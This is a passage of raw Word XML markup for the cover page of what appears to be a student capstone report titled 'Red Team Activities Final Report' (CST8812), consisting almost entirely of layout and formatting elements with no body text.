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 w:val="2"/>
        </w:rPr>
        <w:id w:val="-1612038492"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="1CBF1900" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
          <w:pPr>
            <w:pStyle w:val="NoSpacing"/>
            <w:rPr>
              <w:sz w:val="2"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="3A985DC1" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
          <w:pPr>
            <w:pStyle w:val="NoSpacing"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <mc:AlternateContent>
              <mc:Choice Requires="wps">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5D278BE5" wp14:editId="29E21F25">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="page">
                      <wp:align>center</wp:align>
                    </wp:positionH>
                    <wp:positionV relativeFrom="margin">
                      <wp:align>bottom</wp:align>
                    </wp:positionV>
                    <wp:extent cx="5943600" cy="374904"/>
                    <wp:effectExtent l="0" t="0" r="0" b="2540"/>
                    <wp:wrapNone/>
                    <wp:docPr id="69" name="Text Box 73"/>
                    <wp:cNvGraphicFramePr/>
                    <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                      <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                        <wps:wsp>
                          <wps:cNvSpPr txBox="1"/>
                          <wps:spPr>
                            <a:xfrm>
                              <a:off x="0" y="0"/>
                              <a:ext cx="5943600"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8D977DD" w14:textId="36CF16CD" w:rsidR="00A665A3" w:rsidRDefault="00A665A3">
                                <w:pPr>
                                  <w:pStyle w:val="NoSpacing"/>
                                  <w:jc w:val="right"/>
                                  <w:rPr>
                                    <w:color w:val="156082" w:themeColor="accent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76500</wp14:pctWidth>
                    </wp14:sizeRelH>
                    <wp14:sizeRelV relativeFrom="margin">
                      <wp14:pctHeight>0</wp14:pctHeight>
                    </wp14:sizeRelV>
                  </wp:anchor>
                </w:drawing>
              </mc:Choice>
              <mc:Fallback>
                <w:pict>
                  <v:shapetype w14:anchorId="5D278BE5" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                    <v:stroke joinstyle="miter"/>
                    <v:path gradientshapeok="t" o:connecttype="rect"/>
                  </v:shapetype>
                  <v:shape id="Text Box 73" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:0;width:468pt;height:29.5pt;z-index:251659264;visibility:visible;mso-wrap-style:square;mso-width-percent:765;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:center;mso-position-horizontal-relative:page;mso-position-vertical:bottom;mso-position-vertical-relative:margin;mso-width-percent:765;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" filled="f" stroked="f" strokeweight=".5pt">
                    <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                      <w:txbxContent>
                        <w:p w14:paraId="38D977DD" w14:textId="36CF16CD" w:rsidR="00A665A3" w:rsidRDefault="00A665A3">
                          <w:pPr>
                            <w:pStyle w:val="NoSpacing"/>
                            <w:jc w:val="right"/>
                            <w:rPr>
                              <w:color w:val="156082" w:themeColor="accent1"/>
                              <w:sz w:val="36"/>
                              <w:szCs w:val="36"/>
                            </w:rPr>
                          </w:pPr>
                        </w:p>
                      </w:txbxContent>
                    </v:textbox>
                    <w10:wrap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3F02F657" wp14:editId="07A4FCBB">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="margin">
                      <wp:align>right</wp:align>
                    </wp:positionH>
                    <wp:positionV relativeFrom="margin">
                      <wp:align>center</wp:align>
                    </wp:positionV>
                    <wp:extent cx="5943600" cy="914400"/>
                    <wp:effectExtent l="0" t="0" r="0" b="0"/>
                    <wp:wrapNone/>
                    <wp:docPr id="62" name="Text Box 66"/>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Bernard MT Condensed" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Bernard MT Condensed" w:cstheme="majorBidi"/>
                                    <w:caps/>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7383F07" w14:textId="1D8EFAD6" w:rsidR="00A665A3" w:rsidRPr="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
                                    <w:pPr>
                                      <w:pStyle w:val="NoSpacing"/>
                                      <w:jc w:val="center"/>
                                      <w:rPr>
                                        <w:rFonts w:ascii="Bernard MT Condensed" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Bernard MT Condensed" w:cstheme="majorBidi"/>
                                        <w:caps/>
                                        <w:sz w:val="68"/>
                                        <w:szCs w:val="68"/>
                                      </w:rPr>
                                    </w:pPr>
                                    <w:r w:rsidRPr="00A665A3">
                                      <w:rPr>
                                        <w:rFonts w:ascii="Bernard MT Condensed" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Bernard MT Condensed" w:cstheme="majorBidi"/>
                                        <w:caps/>
                                        <w:sz w:val="64"/>
                                        <w:szCs w:val="64"/>
                                      </w:rPr>
                                      <w:t>CAPSTONE PROJECT CST8812</w:t>
                                    </w:r>
                                  </w:p>
                                </w:sdtContent>
                              </w:sdt>
                              <w:p w14:paraId="132378D4" w14:textId="10D2BB8C" w:rsidR="00A665A3" w:rsidRPr="00A665A3" w:rsidRDefault="00000000" w:rsidP="00A665A3">
                                <w:pPr>
                                  <w:pStyle w:val="NoSpacing"/>
                                  <w:jc w:val="center"/>
                                  <w:rPr>
                                    <w:rFonts w:ascii="Aldhabi" w:hAnsi="Aldhabi" w:cs="Aldhabi"/>
                                    <w:sz w:val="56"/>
                                    <w:szCs w:val="56"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:sdt>
                                  <w:sdtPr>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="Aldhabi"/>
                                      <w:color w:val="000000" w:themeColor="text1"/>
                                      <w:sz w:val="32"/>
                                      <w:szCs w:val="32"/>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A665A3" w:rsidRPr="00E84B46">
                                      <w:rPr>
                                        <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="Aldhabi"/>
                                        <w:color w:val="000000" w:themeColor="text1"/>
                                        <w:sz w:val="32"/>
                                        <w:szCs w:val="32"/>
                                      </w:rPr>
                                      <w:t>RED TEAM ACTIVITIES FINAL REPORT</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 w14:anchorId="3F02F657" id="Text Box 66" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:416.8pt;margin-top:0;width:468pt;height:1in;z-index:251661312;visibility:visible;mso-wrap-style:square;mso-width-percent:765;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:right;mso-position-horizontal-relative:margin;mso-position-vertical:center;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" filled="f" stroked="f" strokeweight=".5pt">
                    <v:textbox style="mso-fit-shape-to-text:t">
                      <w:txbxContent>
                        <w:sdt>
                          <w:sdtPr>
                            <w:rPr>
                              <w:rFonts w:ascii="Bernard MT Condensed" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Bernard MT Condensed" w:cstheme="majorBidi"/>
                              <w:caps/>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67383F07" w14:textId="1D8EFAD6" w:rsidR="00A665A3" w:rsidRPr="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
                              <w:pPr>
                                <w:pStyle w:val="NoSpacing"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Bernard MT Condensed" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Bernard MT Condensed" w:cstheme="majorBidi"/>
                                  <w:caps/>
                                  <w:sz w:val="68"/>
                                  <w:szCs w:val="68"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00A665A3">
                                <w:rPr>
                                  <w:rFonts w:ascii="Bernard MT Condensed" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Bernard MT Condensed" w:cstheme="majorBidi"/>
                                  <w:caps/>
                                  <w:sz w:val="64"/>
                                  <w:szCs w:val="64"/>
                                </w:rPr>
                                <w:t>CAPSTONE PROJECT CST8812</w:t>
                              </w:r>
                            </w:p>
                          </w:sdtContent>
                        </w:sdt>
                        <w:p w14:paraId="132378D4" w14:textId="10D2BB8C" w:rsidR="00A665A3" w:rsidRPr="00A665A3" w:rsidRDefault="00000000" w:rsidP="00A665A3">
                          <w:pPr>
                            <w:pStyle w:val="NoSpacing"/>
                            <w:jc w:val="center"/>
                            <w:rPr>
                              <w:rFonts w:ascii="Aldhabi" w:hAnsi="Aldhabi" w:cs="Aldhabi"/>
                              <w:sz w:val="56"/>
                              <w:szCs w:val="56"/>
                            </w:rPr>
                          </w:pPr>
                          <w:sdt>
                            <w:sdtPr>
                              <w:rPr>
                                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="Aldhabi"/>
                                <w:color w:val="000000" w:themeColor="text1"/>
                                <w:sz w:val="32"/>
                                <w:szCs w:val="32"/>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sidR="00A665A3" w:rsidRPr="00E84B46">
                                <w:rPr>
                                  <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="Aldhabi"/>
                                  <w:color w:val="000000" w:themeColor="text1"/>
                                  <w:sz w:val="32"/>
                                  <w:szCs w:val="32"/>
                                </w:rPr>
                                <w:t>RED TEAM ACTIVITIES FINAL REPORT</w:t>
                              </w:r>
                            </w:sdtContent>
                          </w:sdt>
                        </w:p>
                      </w:txbxContent>
                    </v:textbox>
                    <w10:wrap anchorx="margin" anchory="margin"/>
                  </v:shape>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="05C81DEF" w14:textId="48CB449B" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4514A4EF" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09FFE0F4" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DA3AC97" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="389F739E" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59A07852" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DB8A50B" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="448C47A9" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="006FCD9C" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="246C9D54" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23B2E60E" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A05F5D7" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E4235F2" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60F68B9E" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F045EEB" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="735AEA7E" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="792575FE" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="231AAF75" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AA83038" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3406E108" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D5F464C" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CC988B3" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="770882B9" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FDAB6C2" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1525519D" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E0D7D9D" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="011D6A54" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EE95F98" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="768F33B7" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54AF556D" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22AC7AEA" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C4DF3D6" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4464F8AB" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="741EA06F" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="010B9E97" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CCD44D1" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51BEBCDB" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07FB9AB3" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44B43AF8" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31B385E2" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30F41FB4" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B32A0D8" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="580F6A67" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41FCDB3F" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2063C98D" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E7644E2" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49DFC4BE" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AEA07A9" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F0F06B6" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ED2819E" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11EBA740" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68BF3905" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C016FC5" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74E4011A" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D6D4799" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B4503B9" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34CE4505" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C0853D8" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54FF72DF" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C10A462" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRPr="00A665A3" w:rsidRDefault="00A665A3" w:rsidP="00A665A3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="601556F9" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E696821" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37B6EA07" w14:textId="49EFCD67" w:rsidR="007C1DF7" w:rsidRDefault="00A665A3" w:rsidP="00E36209">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36B01244" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A3"/>
    <w:p w14:paraId="6BEC772E" w14:textId="52C0EF92" w:rsidR="00CC5CB8" w:rsidRDefault="00CC5CB8"/>
    <w:p w14:paraId="3CC6EFA0" w14:textId="0F593963" w:rsidR="00674BB5" w:rsidRDefault="00674BB5"/>
    <w:p w14:paraId="5632E748" w14:textId="79A95638" w:rsidR="00674BB5" w:rsidRDefault="00674BB5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
